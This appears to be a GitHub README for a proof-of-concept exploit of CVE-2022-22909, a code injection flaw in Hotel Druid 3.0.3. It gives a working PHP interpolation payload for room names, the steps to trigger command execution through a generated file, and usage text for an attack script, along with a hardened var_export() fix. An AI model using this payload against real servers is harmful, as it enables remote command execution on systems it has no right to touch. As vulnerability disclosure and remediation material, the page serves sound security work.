0z09e/CVE-2022-22909
CVE-2022-22909

Description

A code injection vulnerability exists in Hotel Druid v3.0.3 that an authenticated attacker can exploit to execute arbitrary commands on the server. Successful exploitation requires an account with the privilege to add a new room.

Vulnerability description

The vulnerability exists because the application writes room names verbatim into a generated PHP file, /dati/selectappartamenti.php, inside a double-quoted string literal. PHP interpolates variables inside double-quoted strings, including the complex syntax {${expr}}, which evaluates expr at runtime, so a room name containing such an expression is executed every time the file runs. Because the file is served from under the web root, it can also be requested directly. The generated file looks like this:

<?php 
// Room names are written verbatim into this double-quoted string,
// so PHP interpolates anything that looks like a variable expression.
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

To exploit the issue, add a new room using the following payload as the room name.

{${system($_REQUEST[cmd])}}

Once the room is saved, request /dati/selectappartamenti.php directly and pass the command to execute in the cmd parameter (GET, POST or cookie all work, since the payload reads $_REQUEST); system() writes the command output into the response.
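The following PHP is an added example, not code from Hotel Druid or from this repository. It generates the same kind of file as the snippet in the vulnerability description from a list of room names, once in the vulnerable double-quoted form and once as plain data via var_export(), and shows that the payload above is live PHP in the first and an inert string literal in the second. The function names (render_vulnerable, render_hardened, options_from_data) and the room list are constructed for illustration, and the hardened form is one possible fix, not the upstream patch.

```php
<?php
// Added example, not Hotel Druid or repository code. Shows why writing room
// names into a double-quoted PHP string is code injection, and one way to
// store the same names as data. The payload is never executed here: the
// vulnerable output is only generated and inspected, never included.

// Vulnerable pattern (same shape as dati/selectappartamenti.php): each name is
// dropped verbatim into echo "...". When that file later runs, PHP's complex
// variable syntax {${expr}} inside the double quotes evaluates expr, so a room
// named {${system($_REQUEST[cmd])}} runs system() with the cmd parameter.
function render_vulnerable(array $rooms): string
{
    $php = "<?php \necho \"\n";
    foreach ($rooms as $room) {
        $php .= "<option value=\\\"$room\\\">$room</option>\n";
    }
    return $php . "\";\n?>\n";
}

// Hardened pattern (assumed fix, not the upstream patch): persist the names as
// a PHP array literal. var_export() emits single-quoted strings, which PHP
// never interpolates, so the same bytes are stored as inert text.
function render_hardened(array $rooms): string
{
    return "<?php\nreturn " . var_export(array_values($rooms), true) . ";\n";
}

// The page that used to include selectappartamenti.php builds the <option>
// list at request time instead, HTML-escaping each name so that a room name
// cannot break out of the value attribute either (a separate XSS concern).
function options_from_data(array $rooms): string
{
    $html = '';
    foreach ($rooms as $room) {
        $safe = htmlspecialchars($room, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $html .= "<option value=\"$safe\">$safe</option>\n";
    }
    return $html;
}

// Constructed input: two normal rooms plus the payload from this page.
$rooms = ['Room1', 'Room2', '{${system($_REQUEST[cmd])}}'];

$bad = render_vulnerable($rooms);
// The payload appears unquoted inside echo "...", i.e. as executable PHP.
printf("vulnerable file contains live payload: %s\n",
    strpos($bad, '{${system($_REQUEST[cmd])}}') !== false ? 'yes' : 'no');

$good = render_hardened($rooms);
echo $good;   // the payload appears as '{${system($_REQUEST[cmd])}}', a literal

// Round trip: write the data file, include it, and confirm nothing ran.
$path = tempnam(sys_get_temp_dir(), 'rooms');
file_put_contents($path, $good);
$loaded = include $path;
unlink($path);
if ($loaded !== $rooms) {
    throw new RuntimeException('room list did not round-trip intact');
}
// The last option renders as the escaped text of the payload, not a shell.
echo options_from_data($loaded);
```

Run it with `php example.php`. The design point is that user-controlled data must never be emitted as PHP source: var_export() keeps it single-quoted and escaped, and the consumer escapes again for the HTML context. Keep the generated data file outside the web root where possible; a `return array(...)` file outputs nothing when requested directly, but it should not need to be reachable at all.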

Usage

usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Example

If the dashboard does not require authentication, pass the --noauth flag and the script skips the login step.

If authentication is enabled, supply the credentials of an account that is allowed to add rooms with --username and --password.

Credits

Researcher and POC writer - 0z09e


About

Hotel Druid 3.0.3 Code Injection to Remote Code Execution